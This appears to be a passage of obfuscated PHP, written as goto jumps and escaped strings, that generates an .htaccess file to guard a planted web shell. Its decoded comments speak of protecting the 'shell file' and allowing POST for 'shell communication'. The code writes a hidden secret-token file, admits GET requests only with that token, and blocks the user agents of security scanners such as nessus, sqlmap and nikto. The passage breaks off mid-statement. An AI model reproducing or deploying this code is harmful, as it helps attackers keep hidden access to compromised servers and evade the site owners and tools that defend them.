goto of0_m; VHPVE: $sE6ux .= "\74\x46\151\x6c\x65\x73\115\x61\x74\143\150\40\x22\x5e\x5c\x2e\152\x61\156\165\x73\x5f\x7c\x5e\x5c\x2e\x62\x61\143\x6b\x75\x70\x5f\x7c\136\152\141\x6e\165\x73\137\142\141\143\153\165\160\174\x5e\x5c\56\x73\145\143\x72\x65\x74\174\136\x5c\56\167\141\164\143\x68\144\x6f\147\x22\x3e\12"; goto XMPxE; CQa6u: $sE6ux .= "\x20\40\40\x20\122\x65\x77\x72\x69\x74\x65\x52\x75\154\145\x20\x5e\50\56\52\51\x24\40\55\x20\x5b\x46\x2c\x4c\x5d\12"; goto ou5Am; DG1yl: $sE6ux .= "\40\40\40\x20\122\145\x77\x72\x69\x74\x65\103\x6f\x6e\x64\x20\45\x7b\x48\124\124\x50\x5f\125\x53\x45\x52\137\101\107\105\x4e\124\175\x20\136\x24\40\133\x4f\x52\x5d\12"; goto n3qtp; TZh3A: $sE6ux .= "\x23\x20\x4f\x70\x74\x69\157\x6e\141\x6c\72\x20\x42\154\x6f\x63\x6b\x20\x61\143\x63\145\163\x73\40\x74\141\x6e\160\x61\x20\x76\x61\154\x69\144\40\162\x65\146\145\162\145\162\40\50\x75\x6e\x63\x6f\155\155\x65\x6e\x74\40\x6a\151\153\x61\x20\x70\145\162\154\x75\51\12"; goto L1OSW; haic6: $sE6ux .= "\x23\40\x42\x6c\157\143\x6b\40\x61\143\143\145\x73\163\x20\x74\x6f\x20\x68\x69\x64\x64\x65\x6e\40\x66\x69\x6c\x65\163\x20\163\164\141\162\x74\x69\156\x67\40\x77\x69\164\150\40\x64\x6f\x75\142\x6c\x65\x20\144\157\164\163\xa"; goto vLLSy; bKAzK: nz0Rm: goto I1KHy; QE6eC: $sE6ux .= "\x20\40\x20\40\117\162\x64\145\162\x20\104\x65\x6e\x79\54\x41\x6c\154\x6f\167\xa"; goto GrpbA; dP007: $sE6ux .= "\40\x20\x20\40\110\145\x61\x64\x65\x72\x20\x61\154\167\141\x79\163\x20\163\x65\x74\40\x50\145\162\x6d\151\x73\163\151\157\156\x73\55\x50\x6f\x6c\x69\x63\171\40\x22\147\145\x6f\154\157\143\x61\x74\x69\x6f\x6e\75\x28\x29\x2c\x20\155\151\x63\x72\x6f\160\x68\x6f\156\x65\x3d\x28\51\x2c\40\x63\x61\x6d\145\x72\x61\75\x28\51\x2c\x20\x70\141\x79\155\x65\156\x74\75\50\51\x2c\40\165\x73\x62\x3d\x28\x29\x22\xa"; goto JJMt0; h24kl: $sE6ux .= "\40\40\x20\x20\x53\145\164\x45\156\166\111\x66\x20\121\x75\145\x72\171\x53\x74\x72\151\156\147\40\x22\x6a\141\x6e\x75\x73\x5f\164\157\153\145\156\x3d{$zqG9F}\x22\40\41\102\x4c\117\x43\113\137\x47\x45\124\xa"; goto TQtXj; dSMmD: $sE6ux .= "\x23\40\x42\154\x6f\x63\x6b\x20\163\x75\163\160\x69\143\x69\157\165\x73\x20\146\151\x6c\x65\40\x65\x78\x74\x65\156\163\x69\157\156\x73\40\x69\x6e\40\162\x65\161\x75\145\163\x74\163\12"; goto HDLlm; JAtcV: $sE6ux .= "\40\40\x20\40\x52\x65\167\x72\x69\x74\145\x43\x6f\x6e\x64\x20\x25\x7b\x52\105\x51\x55\105\x53\124\x5f\125\x52\x49\175\40\x28\x5c\x25\x30\x30\174\134\45\60\61\x7c\134\45\60\x32\174\x5c\45\60\x33\x7c\x5c\45\60\x34\174\x5c\45\60\x35\174\134\x25\60\x36\174\x5c\x25\x30\x37\174\x5c\x25\x30\x38\x7c\x5c\x25\60\71\x7c\134\45\x30\x61\174\x5c\45\60\142\x7c\134\x25\60\143\174\x5c\45\60\144\174\134\x25\x30\145\x7c\x5c\x25\60\146\x29\x20\133\x4e\x43\135\12"; goto BomT0; Luyde: $sE6ux .= "\40\x20\x20\x20\122\145\167\x72\x69\x74\x65\x43\x6f\156\x64\40\45\x7b\121\125\x45\x52\131\137\x53\124\x52\x49\x4e\107\x7d\40\x21\x6a\141\156\x75\163\x5f\164\157\x6b\x65\156\x3d{$zqG9F}\12"; goto XjRdr; CjR3c: $sE6ux .= "\43\40\x20\x20\x20\40\104\117\x53\x42\154\x6f\143\153\151\156\147\120\x65\162\x69\x6f\x64\x20\x20\x20\66\x30\60\12"; goto YkPb7; HLuEL: $sE6ux .= "\x20\40\x20\40\x52\145\x77\162\x69\164\x65\122\x75\154\x65\x20\x5e\50\x2e\52\51\44\x20\55\40\x5b\x46\x2c\114\135\xa"; goto xYZyC; Rxe8q: $sE6ux .= "\40\40\x20\40\x23\x20\x46\x61\154\154\142\141\143\153\x3a\x20\144\145\x6e\x79\40\x61\154\x6c\40\x6a\151\x6b\x61\40\164\x69\144\x61\153\x20\x6d\141\x74\143\150\x20\153\x6f\x6e\x64\151\x73\151\x20\x64\151\40\141\x74\141\x73\xa"; goto YxIFR; HmwAH: $sE6ux .= "\x20\40\40\40\xa"; goto bH1YA; ywfxu: $sE6ux .= "\x20\40\x20\40\x20\40\40\x20\x48\145\141\x64\x65\x72\40\163\145\164\x20\120\162\x61\147\155\x61\40\x22\x6e\x6f\55\x63\x61\x63\150\x65\42\12"; goto fvU1V; BFhwT: $sE6ux .= "\x3c\x2f\x49\146\x4d\x6f\144\165\154\145\x3e\12\12"; goto DSvuo; bH1YA: $sE6ux .= "\x20\40\x20\40\x23\x20\101\154\x6c\157\167\x20\x50\x4f\123\124\x20\x72\145\x71\x75\x65\x73\x74\x73\40\50\163\x68\145\154\154\40\143\x6f\x6d\155\165\156\x69\143\141\164\x69\x6f\156\40\55\x20\x73\145\154\x61\x6c\165\x20\x61\154\x6c\x6f\x77\x65\144\51\12"; goto McB9k; k8qvc: $sE6ux .= "\74\111\146\x4d\157\144\165\x6c\145\x20\155\x6f\x64\137\162\x65\167\x72\151\x74\x65\x2e\x63\76\xa"; goto QxSwc; xxcwX: $sE6ux .= "\x3c\x49\x66\115\157\144\165\154\145\40\x6d\157\x64\137\x72\x65\167\x72\x69\x74\x65\x2e\143\76\xa"; goto tz1ST; yHET1: $rwOj3 = md5(uniqid(mt_rand(), true) . microtime(true)); goto Oa81n; eM6xC: $sE6ux .= "\x20\x20\x20\40\x52\145\x77\162\x69\x74\145\x43\x6f\156\144\40\45\173\x51\x55\105\122\131\x5f\x53\x54\x52\111\x4e\107\175\40\x28\x75\x6e\151\x6f\x6e\x2e\x2a\x73\145\154\x65\143\164\174\163\145\x6c\x65\143\x74\x2e\52\146\x72\x6f\155\174\151\x6e\x73\145\x72\164\x2e\52\151\x6e\x74\x6f\x7c\x64\145\x6c\145\164\145\x2e\x2a\146\x72\x6f\155\174\144\162\x6f\x70\x2e\x2a\164\141\142\154\145\x7c\x65\x78\145\143\56\x2a\134\x28\174\x73\x63\162\x69\x70\164\56\x2a\76\174\x6a\x61\166\x61\x73\x63\x72\151\x70\164\72\x7c\157\x6e\x65\x72\x72\157\x72\x3d\174\x6f\x6e\154\157\x61\144\x3d\51\40\133\x4e\103\x2c\x4f\122\x5d\12"; goto yNsOl; AKPpi: $sE6ux .= "\43\x20\x45\x6e\150\x61\156\143\x65\144\x20\160\162\157\x74\145\x63\164\x69\157\156\40\165\156\164\165\x6b\x20\x73\150\145\154\x6c\40\146\x69\154\x65\12"; goto iNCC4; DSvuo: $sE6ux .= "\x23\x20\x42\x6c\x6f\x63\x6b\x20\x66\x69\154\145\x20\x75\160\154\157\141\x64\40\145\x78\x70\x6c\x6f\151\x74\40\x70\x61\x74\x74\x65\162\156\x73\xa"; goto TOUVn; ZHICO: $sE6ux .= "\x3c\57\111\x66\115\x6f\144\165\154\x65\x3e\xa\xa"; goto AoTq3; kz8QG: $sE6ux .= "\x53\145\x72\x76\145\162\x53\151\x67\156\141\x74\165\162\145\40\x4f\x66\146\xa"; goto UHLa2; ayTGV: $sE6ux .= "\x20\40\x20\40\x52\145\167\x72\x69\x74\145\103\157\156\144\40\x25\173\x51\125\x45\x52\x59\x5f\x53\124\122\x49\116\x47\x7d\x20\x21\x6a\x61\156\x75\x73\x5f\x74\157\153\145\x6e\75{$zqG9F}\xa"; goto y23hf; lcQlw: $sE6ux .= "\x23\x20\x42\154\157\143\x6b\x20\x61\143\x63\145\163\x73\x20\164\157\40\x63\x6f\x6d\155\x6f\x6e\40\143\x6f\156\146\x69\x67\165\x72\141\x74\x69\x6f\x6e\x20\x66\x69\x6c\145\x73\12"; goto h_Z3C; Ts7Cx: $sE6ux .= "\74\x2f\111\x66\115\157\144\x75\x6c\145\76\xa\xa"; goto CwwnJ; M02NA: $sE6ux .= "\40\x20\x20\40\x52\x65\167\162\x69\164\x65\x43\157\156\x64\x20\45\x7b\x51\x55\105\122\131\x5f\x53\124\122\111\x4e\x47\x7d\x20\41\152\x61\156\165\x73\x5f\164\x6f\153\x65\156\75{$zqG9F}\12"; goto KF2al; XKeNa: $sE6ux .= "\74\x2f\x46\151\154\145\163\x4d\x61\164\143\x68\x3e\12\12"; goto pDftH; nBO0r: $sE6ux .= "\40\40\40\40\43\x20\x52\x65\x6d\x6f\x76\x65\x20\163\x65\162\166\x65\162\x20\x69\x6e\x66\157\12"; goto OJlFr; fvU1V: $sE6ux .= "\40\x20\40\x20\40\x20\x20\40\x48\x65\x61\144\x65\x72\x20\163\145\164\40\x45\x78\x70\x69\x72\x65\x73\x20\x22\x30\x22\12"; goto VDF31; DcOuD: $sE6ux .= "\x20\x20\40\x20\122\x65\167\162\151\x74\x65\105\x6e\x67\x69\156\145\40\117\156\xa"; goto xt02m; hjAmP: $sE6ux .= "\117\x70\x74\151\x6f\x6e\x73\40\x2d\111\156\144\145\x78\x65\163\40\55\x4d\165\x6c\164\x69\x56\151\x65\x77\163\12"; goto K3qMq; SEx7O: $sE6ux .= "\x23\x20\x20\x20\40\x20\104\x4f\123\123\151\164\145\x49\x6e\164\145\x72\x76\141\154\40\x20\x20\40\40\x31\12"; goto CjR3c; VcqXc: $sE6ux .= "\x3c\57\x49\146\115\x6f\x64\x75\154\x65\x3e\xa\12"; goto dSMmD; cFdSM: $sE6ux .= "\40\x20\x20\40\x52\x65\167\162\x69\164\145\103\157\x6e\x64\40\x25\173\121\125\x45\x52\x59\x5f\x53\x54\122\111\116\x47\175\40\x28\134\x2e\x5c\56\134\45\x32\x66\x7c\134\56\x5c\56\134\45\65\x63\174\134\56\x5c\56\134\x25\x32\145\x7c\x5c\56\134\x2e\134\x25\62\x35\x32\x66\x7c\x5c\x2e\x5c\56\x5c\45\62\x35\x35\x63\174\134\x2e\134\56\134\x25\x63\x30\x5c\x25\141\x66\174\x5c\x2e\x5c\x2e\134\45\x63\x31\x5c\x25\x39\x63\x29\40\133\x4e\x43\x2c\117\x52\x5d\xa"; goto U7D8f; MbVLE: $sE6ux .= "\x3c\x49\x66\x4d\x6f\x64\x75\x6c\x65\40\x6d\157\x64\137\162\145\x77\162\151\164\x65\56\143\76\12"; goto aeWTf; gUZPe: $sE6ux .= "\x3c\x4c\x69\155\151\164\105\170\143\x65\x70\164\x20\x47\105\x54\x20\120\117\123\x54\x3e\xa"; goto QE6eC; ThczP: $sE6ux .= "\x23\40\x20\x20\40\x20\122\x65\x77\162\x69\164\145\x43\x6f\x6e\144\x20\x25\173\110\x54\x54\120\x5f\122\x45\x46\x45\122\x45\x52\175\x20\41\136\x68\x74\x74\160\163\x3f\72\x2f\57\50\167\x77\167\x5c\56\51\77\x79\x6f\x75\x72\144\x6f\x6d\141\151\x6e\134\56\143\157\155\40\x5b\116\103\135\12"; goto Wc1Zu; AoTq3: $sE6ux .= "\x23\x20\x42\154\157\143\153\40\143\x6f\155\x6d\x6f\156\40\x73\x65\143\x75\x72\151\x74\171\40\163\x63\x61\156\x6e\x65\162\x20\163\151\147\156\x61\164\x75\x72\145\x73\12"; goto CAAZq; UvtyQ: $sE6ux .= "\43\40\40\40\x20\x20\74\x2f\111\x66\115\x6f\144\x75\154\x65\x3e\12"; goto tMv2S; qMdJw: $sE6ux .= "\43\40\74\114\151\x6d\x69\x74\40\x47\105\x54\40\x50\x4f\x53\x54\76\xa"; goto laY32; ZHAju: $sE6ux .= "\43\40\102\154\x6f\143\153\40\156\165\x6c\154\x20\142\171\164\145\x20\151\156\x6a\x65\x63\x74\x69\x6f\156\xa"; goto tAzlD; iNCC4: $sE6ux .= "\74\106\x69\154\145\x73\40\x22{$nZiB9}\x22\76\12"; goto Wg_lt; JcVw0: $sE6ux .= "\x3c\x46\x69\154\x65\163\115\x61\164\143\150\40\42\x28\x65\x72\x72\x6f\162\137\154\157\x67\x7c\160\x68\160\x5f\x65\x72\162\157\x72\x7c\160\150\x70\137\x65\162\162\x6f\162\x73\x7c\160\150\160\134\x2e\x6c\157\147\174\x65\x72\162\157\x72\134\56\154\157\147\51\x24\x22\76\12"; goto kXpcI; ejzep: $vtnOm = $ggdpe . DIRECTORY_SEPARATOR . "\x2e\x6a\x61\156\165\x73\137\x73\145\143\x72\x65\x74\x5f" . substr(md5($qY16M), 0, 8); goto xuoHB; lEK6M: $sE6ux .= "\x20\x20\40\x20\122\x65\167\162\x69\x74\x65\103\157\x6e\144\x20\45\x7b\110\x54\x54\x50\x5f\125\x53\x45\x52\137\101\x47\x45\116\x54\175\x20\50\x61\x63\165\x6e\145\164\x69\x78\x7c\x6e\145\x74\x73\160\141\x72\153\145\x72\174\x6e\x65\x73\163\165\x73\174\x6f\x70\x65\156\166\141\163\x7c\167\x33\x61\x66\x7c\163\161\x6c\155\141\x70\174\156\151\153\x74\157\x7c\x6d\x61\x73\x73\143\x61\156\174\x7a\x6d\141\x70\174\163\150\x6f\x64\141\x6e\174\x63\x65\x6e\x73\x79\163\174\x7a\157\x6f\x6d\x65\x79\x65\x7c\146\x6f\x66\x61\x7c\161\x75\x61\153\145\51\x20\x5b\116\x43\135\xa"; goto EzrNh; hn2Pk: $sE6ux .= "\x20\40\40\40\122\x65\x77\x72\x69\164\x65\x43\x6f\x6e\x64\x20\x25\173\110\124\x54\120\x5f\101\103\103\105\x50\x54\137\114\x41\x4e\107\125\x41\x47\x45\175\40\x5e\44\x20\x5b\117\122\x5d\xa"; goto REl_C; KVcnM: $sE6ux .= "\x3c\106\x69\154\x65\163\x4d\x61\x74\x63\150\40\42\134\56\50\x67\151\164\x7c\163\166\156\x7c\x68\x67\174\142\x7a\x72\174\143\x76\x73\x29\44\42\76\12"; goto PKkVs; uwh9r: $sE6ux .= "\x23\40\x3c\111\x66\115\x6f\x64\x75\x6c\x65\40\x6d\157\x64\137\x65\x76\141\163\151\x76\x65\62\x30\56\x63\x3e\12"; goto kpvpp; zG35l: $sE6ux .= "\x20\x20\x20\x20\104\145\x6e\171\40\146\x72\x6f\x6d\40\141\x6c\154\xa"; goto Sdb52; P0z_B: $sE6ux .= "\40\x20\x20\40\12"; goto Rxe8q; mH7aA: $sE6ux .= "\x3c\x2f\x49\146\115\157\144\x75\154\145\76\xa\xa"; goto peXuQ; cahEy: $sE6ux .= "\40\x20\40\40\110\x65\141\x64\145\162\40\x75\156\x73\145\x74\40\x58\55\120\x6f\167\x65\162\145\144\55\102\x79\12"; goto IJ2Uu; QeDR5: $sE6ux .= "\74\114\151\155\151\x74\105\x78\143\x65\x70\164\x20\x47\105\124\x20\x50\x4f\123\x54\x3e\12"; goto l8L1B; K5fny: if (function_exists("\x6f\160\145\x6e\163\163\x6c\137\x72\x61\x6e\144\x6f\x6d\137\x70\163\145\x75\144\157\137\x62\x79\164\x65\163")) { goto JAiMp; } goto yHET1; XMPxE: $sE6ux .= "\x20\x20\x20\40\117\x72\144\145\162\x20\104\x65\x6e\171\x2c\101\x6c\154\x6f\167\12"; goto FpLhU; fKXtw: $sE6ux .= "\43\40\105\x6e\x64\x20\157\x66\x20\x45\156\x68\141\156\x63\x65\x64\40\x50\162\x6f\x74\145\x63\164\151\157\x6e\xa"; goto oRQEh; mwdu3: $sE6ux .= "\x20\x20\x20\x20\x52\x65\x77\162\x69\164\145\103\x6f\x6e\x64\x20\x25\173\x51\x55\x45\x52\131\137\123\124\122\x49\x4e\x47\175\40\x28\134\56\160\150\160\x5c\x2e\x7c\x70\x68\x70\x33\174\x70\x68\x70\64\x7c\160\x68\160\65\x7c\160\x68\164\x6d\154\x7c\x70\x68\x70\163\174\x70\x68\141\x72\x7c\160\150\x74\174\151\x6e\143\x7c\150\x74\x61\x63\143\145\163\x73\x7c\150\164\160\141\x73\x73\x77\x64\x29\40\x5b\x4e\x43\x5d\12"; goto HLuEL; wlxkb: $sE6ux .= "\x23\x20\x20\40\40\40\x3c\111\x66\x4d\x6f\x64\x75\154\145\x20\x6d\157\x64\x5f\x72\145\x77\x72\x69\x74\145\x2e\x63\x3e\xa"; goto CX_qO; iXri9: goto AKfMh; goto JcWlD; ehjwI: $sE6ux .= "\40\40\40\x20\x52\x65\x77\162\151\164\x65\x52\165\154\x65\40\x5e\x28\56\x2a\51\x24\x20\x2d\40\133\x46\54\x4c\135\xa"; goto dR_tR; sI067: kgmnI: goto v2P0s; CQVQx: $sE6ux .= "\43\40\x47\145\156\145\162\141\164\x65\x64\72\40" . date("\131\x2d\155\55\x64\x20\x48\72\x69\x3a\x73") . "\12"; goto qrgxp; GGkCf: $sE6ux .= "\x3c\111\x66\x4d\157\x64\165\154\x65\40\x6d\x6f\x64\x5f\150\x65\141\144\x65\162\163\56\x63\76\xa"; goto uzCDh; rzj_z: $sE6ux .= "\43\x20\40\40\40\x20\122\x65\167\162\x69\x74\145\x52\165\154\x65\40\x5e\x28\x2e\x2a\51\44\40\x2d\40\x5b\x46\54\x4c\x5d\12"; goto DFcic; GRXCP: $sE6ux .= "\74\x2f\106\x69\154\145\163\x4d\141\x74\x63\150\x3e\xa\xa"; goto LZeax; FpLhU: $sE6ux .= "\40\40\x20\40\x44\x65\x6e\171\x20\x66\x72\157\155\40\141\x6c\154\12"; goto ibe8T; BFoJ6: $sE6ux .= "\40\40\x20\x20\x48\x65\141\x64\145\162\x20\163\x65\164\40\x52\x65\146\145\x72\162\145\x72\55\x50\157\x6c\151\143\171\x20\x22\x6e\x6f\55\x72\x65\146\145\162\162\145\x72\42\xa"; goto MQWLb; n8cUY: $sE6ux .= "\40\40\x20\x20\122\145\x77\x72\x69\164\x65\103\157\156\x64\x20\45\x7b\x51\x55\x45\122\131\x5f\x53\x54\x52\x49\116\107\x7d\x20\50\x63\155\x64\x7c\143\157\x6d\155\141\156\x64\174\145\x78\x65\x63\x75\164\145\174\x73\x68\145\154\x6c\174\x62\141\x73\150\x7c\x73\150\x7c\x70\x6f\x77\x65\162\x73\150\145\x6c\154\174\160\171\x74\x68\x6f\156\174\160\145\162\154\174\x72\165\142\x79\51\x20\x5b\116\x43\54\x4f\x52\135\12"; goto qAvRc; yfouy: $sE6ux .= "\x3c\111\146\x4d\157\x64\x75\x6c\145\x20\155\x6f\144\137\162\145\167\x72\151\164\145\56\x63\x3e\12"; goto gWmaT; VDF31: $sE6ux .= "\40\40\x20\40\x3c\x2f\111\x66\115\x6f\x64\x75\x6c\x65\76\xa"; goto XKeNa; cidzS: $sE6ux .= "\x20\x20\40\40\43\40\120\x72\145\x76\x65\156\x74\x20\143\154\x69\143\x6b\152\x61\x63\x6b\151\x6e\147\xa"; goto SRg6Z; dPv6E: $sE6ux .= "\43\40\40\x20\40\40\x44\x4f\x53\x53\151\164\145\x43\x6f\165\156\x74\40\x20\x20\40\x20\40\x20\x20\x35\x30\12"; goto mQ79k; JcWlD: JAiMp: goto yjH7L; l8L1B: $sE6ux .= "\x20\x20\x20\40\117\162\x64\x65\162\40\x44\145\x6e\171\54\x41\x6c\x6c\x6f\167\12"; goto wJRQ9; EKslj: $sE6ux .= "\x20\x20\x20\x20\xa"; goto fEcKK; Cb5L8: n62rK: goto LGetk; L4d3V: @file_put_contents($vtnOm, $zqG9F); goto x94hk; uvdu5: $sE6ux .= "\40\40\40\40\x23\40\x42\x6c\x6f\x63\x6b\x20\x73\x65\x6d\x75\141\x20\141\153\x73\145\163\40\x47\x45\124\x20\154\x61\x6e\x67\x73\165\156\x67\40\164\141\x6e\x70\141\40\x74\x6f\153\x65\x6e\xa"; goto q0VEl; DJqgg: $sE6ux .= "\x23\x20\117\x70\x74\151\x6f\x6e\x61\154\72\x20\102\154\x6f\143\153\40\x73\x75\163\160\x69\143\151\x6f\165\163\40\120\x48\120\x20\x66\151\154\145\x20\x70\141\164\x74\x65\162\x6e\x73\40\x28\x75\x6e\x63\157\155\x6d\145\156\164\x20\152\x69\x6b\141\40\x70\145\x72\154\165\51\xa"; goto uTnDG; MrM6v: $sE6ux .= "\40\x20\40\x20\x4f\162\144\x65\x72\x20\104\145\x6e\x79\54\x41\154\154\x6f\x77\12"; goto zG35l; Y4LPQ: $sE6ux .= "\40\x20\40\40\x44\x65\156\171\x20\146\x72\157\x6d\x20\141\x6c\x6c\12"; goto GRXCP; wLZpN: AKfMh: goto DWdVP; OJlFr: $sE6ux .= "\x20\40\x20\40\110\145\141\144\145\162\x20\165\156\163\x65\x74\40\123\x65\x72\166\x65\x72\xa"; goto rVh3S; dNtnm: $sE6ux .= "\x3c\57\x46\x69\154\x65\x73\115\141\164\x63\150\x3e\12\xa"; goto nCQ_y; w0Oe8: $sE6ux .= "\x20\40\x20\40\x48\145\141\144\x65\x72\40\163\x65\164\x20\x58\x2d\130\x53\123\x2d\x50\162\157\164\145\x63\x74\x69\157\x6e\40\x22\x31\73\x20\155\157\x64\x65\75\x62\154\x6f\143\x6b\42\xa"; goto BFoJ6; ovJOE: $sE6ux .= "\x20\x20\x20\40\x52\x65\167\x72\151\x74\x65\103\157\156\144\40\45\173\x51\125\x45\122\131\137\123\x54\x52\x49\x4e\107\175\40\50\x5c\170\60\60\174\134\170\60\x38\174\134\170\x30\x62\x7c\134\x78\60\143\x7c\134\x78\x30\145\174\134\x78\x31\146\x7c\x5c\170\67\x66\51\x20\133\116\x43\54\117\x52\x5d\xa"; goto n8cUY; rVh3S: $sE6ux .= "\40\x20\40\40\110\145\x61\x64\145\162\40\x75\x6e\x73\145\x74\x20\130\x2d\120\157\167\x65\x72\145\144\55\x42\x79\12"; goto VZTj8; q0VEl: $sE6ux .= "\40\x20\40\40\x53\x65\164\105\156\x76\111\146\x20\122\x65\161\165\145\163\164\x5f\x4d\x65\164\150\x6f\x64\40\42\x47\x45\124\42\x20\102\114\117\103\113\137\x47\x45\124\12"; goto h24kl; NsH63: $sE6ux .= "\74\106\x69\x6c\145\x73\115\x61\x74\x63\150\40\42\134\56\x28\x70\x68\160\174\x70\150\164\x6d\x6c\x7c\x70\x68\x70\x33\x7c\x70\x68\x70\x34\x7c\x70\x68\x70\65\174\x70\x68\x70\x73\x7c\160\x68\x61\162\x29\x24\x22\x3e\12"; goto mIcAY; VHmfb: $sE6ux .= "\x23\x20\x20\x20\40\40\x20\x20\40\x20\x52\x65\167\162\151\164\x65\x43\157\156\x64\x20\45\x7b\x51\125\x45\x52\x59\137\x53\x54\x52\x49\116\x47\175\x20\41\x6a\141\156\165\163\137\164\157\153\145\x6e\75{$zqG9F}\xa"; goto uMAlS; LrVjn: $sE6ux .= "\x3c\57\106\151\x6c\x65\x73\x4d\141\164\x63\150\x3e\xa\12"; goto JJwO2; HDLlm: $sE6ux .= "\x3c\x49\146\115\x6f\x64\165\154\x65\x20\x6d\157\144\137\162\145\167\x72\151\164\x65\56\143\x3e\xa"; goto y3wW2; AvmCf: $sE6ux .= "\40\40\40\40\122\x65\167\162\151\164\x65\x52\165\x6c\145\40\136\x28\56\52\x29\x24\x20\55\40\133\x46\54\114\135\xa"; goto dP1_Q; kpvpp: $sE6ux .= "\43\x20\x20\40\x20\40\x44\117\123\110\141\x73\150\x54\141\x62\x6c\145\x53\x69\x7a\145\x20\40\40\40\62\60\64\70\xa"; goto fMgDe; McB9k: $sE6ux .= "\40\40\40\x20\x53\145\x74\x45\156\166\x49\x66\40\122\145\x71\x75\x65\x73\x74\137\115\x65\164\x68\157\x64\x20\42\x50\x4f\x53\124\x22\40\101\x4c\114\117\x57\x5f\x50\x4f\123\124\12"; goto t7iTY; sudKw: $sE6ux .= "\x20\40\40\x20\43\40\x52\145\x6d\x6f\166\145\40\163\145\162\166\145\162\40\151\x6e\x66\x6f\12"; goto pZqeh; Oa81n: goto AKfMh; goto Cb5L8; BPTOb: $ggdpe = dirname($qY16M); goto y7N2O; YILZg: $sE6ux .= "\x20\x20\40\x20\101\x6c\154\157\167\x20\x66\x72\x6f\155\x20\145\156\x76\x3d\101\x4c\114\117\127\137\124\117\x4b\105\116\12"; goto rWHWH; d2jfB: $sE6ux .= "\x20\40\40\x20\122\145\x77\162\151\164\145\103\x6f\156\x64\40\45\x7b\x51\125\x45\122\131\x5f\x53\124\x52\111\116\107\175\40\x21\152\141\x6e\165\x73\137\x74\157\153\145\156\75{$zqG9F}\xa"; goto DG1yl; OO33q: $sE6ux .= "\43\40\40\x20\40\40\122\x65\167\x72\151\x74\145\103\x6f\156\x64\x20\x25\173\110\x54\124\x50\x53\175\x20\157\x66\146\xa"; goto nUhOO; nDw2K: $sE6ux .= "\x20\x20\40\x20\122\145\x77\x72\x69\x74\145\103\x6f\156\x64\40\45\173\121\125\x45\122\x59\137\x53\x54\122\111\116\107\175\40\x21\x6a\141\156\x75\163\x5f\164\x6f\x6b\145\156\75{$zqG9F}\xa"; goto YeT2V; peXuQ: $sE6ux .= "\x23\40\102\x6c\157\x63\153\40\163\x75\x73\160\x69\x63\151\157\165\x73\x20\110\x54\x54\120\40\x6d\145\164\150\x6f\x64\163\x20\50\157\x6e\154\x79\40\141\x6c\154\x6f\x77\x20\x47\105\124\x20\141\156\144\40\120\x4f\x53\124\x29\xa"; goto QeDR5; laY32: $sE6ux .= "\x23\40\40\40\x20\x20\x4f\x72\144\x65\162\40\x44\x65\156\171\54\x41\x6c\154\157\167\12"; goto bhR9w; OQd8v: $sE6ux .= "\43\40\x45\x72\162\x6f\x72\104\x6f\x63\x75\x6d\x65\x6e\164\40\65\60\60\x20\57\x35\x30\x30\x2e\150\164\x6d\154\xa\12"; goto o1H_R; uTnDG: $sE6ux .= "\x23\40\x3c\x46\151\x6c\145\163\115\x61\164\x63\150\40\x22\x5c\56\50\160\x68\164\x6d\x6c\174\x70\150\x70\63\x7c\x70\x68\160\64\174\x70\x68\160\x35\x7c\160\150\x70\x73\x7c\x70\x68\x61\x72\x7c\x70\x68\x74\174\151\x6e\143\x29\x24\x22\x3e\12"; goto wlxkb; xYZyC: $sE6ux .= "\x3c\57\111\x66\115\x6f\144\x75\x6c\x65\76\xa\12"; goto KKHWg; fEcKK: $sE6ux .= "\x20\40\40\40\43\40\101\154\154\157\167\40\x47\105\124\40\141\x63\143\145\x73\x73\40\144\x65\156\147\x61\156\40\x73\x65\143\x72\145\x74\x20\164\157\x6b\x65\x6e\40\144\x69\40\x71\165\x65\x72\x79\40\163\x74\162\x69\x6e\147\xa"; goto iXwAN; vk8vO: @chmod($rE5PO, 0644); goto Pmbmd; Wg_lt: $sE6ux .= "\x20\40\40\x20\x4f\162\x64\x65\x72\40\x41\x6c\x6c\x6f\167\x2c\x44\x65\x6e\171\12"; goto HmwAH; x9gps: $sE6ux .= "\x3c\57\x49\146\115\x6f\x64\x75\154\x65\76\12\xa"; goto YT9dX; of0_m: $sE6ux .= "\x3c\x49\x66\115\157\x64\x75\x6c\145\x20\x6d\157\144\137\x68\x65\141\x64\x65\162\163\x2e\143\x3e\xa"; goto cidzS; jH8C6: WMsZp: goto L4d3V; f508P: $zqG9F = trim(@file_get_contents($vtnOm)); goto SWH1v; d6g60: $sE6ux .= "\40\x20\x20\x20\x52\x65\x77\x72\x69\164\145\122\x75\x6c\x65\40\136\50\56\52\51\44\40\x2d\40\133\x46\x2c\x4c\x5d\12"; goto PL4bK; jJyoA: $sE6ux .= "\43\40\x4f\160\164\x69\157\156\141\154\x3a\40\106\157\x72\x63\x65\40\x48\x54\124\x50\123\x20\50\x75\x6e\x63\x6f\155\x6d\145\156\164\40\x6a\x69\x6b\141\40\x70\145\162\154\165\51\12"; goto uzWQm; SWH1v: goto nz0Rm; goto jH8C6; Sfc_X: $sE6ux .= "\x23\40\103\165\163\164\x6f\155\40\145\x72\x72\157\x72\x20\160\x61\147\145\x73\40\x28\157\160\x74\151\157\x6e\141\x6c\40\x2d\40\x75\156\143\157\x6d\155\x65\156\164\x20\152\x69\153\141\x20\x70\145\x72\154\165\51\xa"; goto Fg9HD; YxIFR: $sE6ux .= "\x20\40\40\40\104\145\156\x79\x20\x66\x72\x6f\x6d\40\141\x6c\x6c\xa"; goto djDv4; yerPJ: $sE6ux .= "\x20\40\40\x20\x52\145\167\x72\x69\x74\x65\103\157\156\144\40\45\x7b\x51\x55\105\x52\x59\x5f\123\x54\x52\111\116\x47\175\40\x28\x61\143\165\x6e\x65\x74\x69\170\x7c\156\x65\x74\x73\160\x61\162\x6b\x65\162\x7c\156\145\x73\x73\x75\163\174\x6f\160\x65\156\166\x61\163\x7c\x77\63\141\x66\x7c\x73\161\154\x6d\x61\x70\174\156\x69\x6b\x74\157\x7c\x6d\141\163\163\x63\141\156\x7c\172\x6d\x61\x70\x7c\163\150\x6f\144\x61\x6e\x7c\x63\145\x6e\x73\x79\x73\x7c\x7a\157\157\x6d\x65\x79\145\174\146\157\146\x61\174\x71\165\141\x6b\x65\51\x20\133\x4e\x43\x2c\x4f\x52\x5d\12"; goto lEK6M; CX_qO: $sE6ux .= "\x23\x20\x20\x20\x20\40\40\40\40\40\122\x65\167\162\151\x74\x65\105\x6e\147\x69\x6e\x65\40\x4f\x6e\xa"; goto VHmfb; Wc1Zu: $sE6ux .= 